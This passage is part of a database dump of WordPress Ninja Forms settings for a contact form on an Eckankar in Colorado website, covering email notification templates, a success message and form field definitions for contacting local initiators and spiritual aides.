Form\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:85;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:55\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_180}\";s:13:\"email_subject\";s:37:\"Pueblo Area Initiators and ESAâs\";s:13:\"email_message\";s:3757:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_178},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Pueblo ECK Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_178}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_179}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_180}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_181}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_182}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166886411}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_186}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:86;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:55\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:11:\"success_msg\";s:361:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:87;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:55\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:37:\"Pueblo Area Initiators and ESAâs\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3892:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Pueblo Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Pueblo ECK Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_178}Â {field:lastname_179}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_178}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_179}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_180}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_181}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_182}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166886411}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_186}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:88;}}s:8:\"settings\";a:40:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:26:\"Pueblo Initiators and ESAs\";s:10:\"created_at\";s:19:\"2019-07-15 14:07:28\";s:10:\"form_title\";s:32:\"Pueblo Initiators and ESAâs\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 17:53:31\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:10:{i:0;s:8:\"html_177\";i:1;s:11:\"textbox_178\";i:2;s:12:\"lastname_179\";i:3;s:9:\"email_180\";i:4;s:9:\"phone_181\";i:5;s:14:\"listselect_182\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166886411\";i:7;s:12:\"textarea_186\";i:8;s:18:\"html_1663800683276\";i:9;s:10:\"submit_188\";}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(23,'a:7:{s:2:\"id\";i:23;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:10:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:1264:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Southwest Mountain Area Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:1262:\"<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Southwest Mountain Area Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>\";s:3:\"key\";s:8:\"html_189\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_189\";}s:2:\"id\";i:245;}i:1;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_190\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_190\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:246;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_191\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_191\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:247;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_192\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_192\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:248;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9